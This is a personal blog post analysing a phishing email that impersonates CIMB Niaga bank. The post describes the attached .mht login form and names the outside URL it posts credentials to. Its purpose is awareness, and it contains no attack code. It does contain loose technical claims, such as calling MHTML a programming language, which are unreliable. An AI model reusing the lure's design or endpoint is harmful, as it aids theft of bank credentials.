Few days ago, I got an email from a local bank to update a CIMB Niaga internet banking account profile.
The email sender looks convincing, but wait, I don’t have an account at this bank!, why the hell did they sent this to me for ?
So this triggered my curiosity, and so i come up with simple analysis, so here goes….
Notice the red highlights, the email is a real corporate account, check the website domain here
People will always trust a corporate account right?
Here’s the interesting part, the email told me that i have to update my internet banking account(in which i don’t have) in order to synchronize with their new updated secure system(so they said), and told me to download a file in order to fill out the new account information.
And if I don’t do it for the next 24 hours, my account will be freeze for security reason!
“what the fuck?, what kind of method is this ?”
Getting more curious, so i downloaded the file “CIMB Clicks.mht”
common people usually open the file straight after it finished downloaded without knowing what the file might do to their computer, it might be a virus or whatever…. well that is foolish.
First you need to know the last extension means, .mht file extension is one of HTML document format, stands for MHTML, a programming language to make websites (please search for it on google for detail explanation).
The difference between HTML and MHTML is, MHTML can combine resources inside one .mht file, we can put images, videos, etc in one .mht file, while HTML can’t.
The difference is in the URL(Uniform Resource Locator), look at the red highlights….
This hacking method known as phishing, a method that attempt to acquire sensitive information such as username or password by mimicking certain websites(internet banking, facebook, etc), usually the log-in form.
common people usually ignore this…
look at the highlights part of the image, so when we submit the login information, the page will be redirected to “http://www.zaiedcool.com/images/logininfo.php”
but thankfully, The file “logininfo.php” is not exist, which is probably inside the “logininfo.php” file lies the script that will store my login information(username & password) to the hacker database.
So who or what is responsible for this?
This can be from the person who holds the email account, maybe his/her PC got infected with keylogging virus, a virus that records every keyboard activity then sends it back to the hacker.
Where can you get infected with this kind virus?… Porn sites, betting sites, untrusted gaming sites, untrusted facebook applications, etc
We can also blame the system, crackers and hackers can break into vulnerable security system and holds control of the system, and then sends broadcast email without the system administrator knowing whats going on.
That is all folks, hope this post will be useful to those who reads 🙂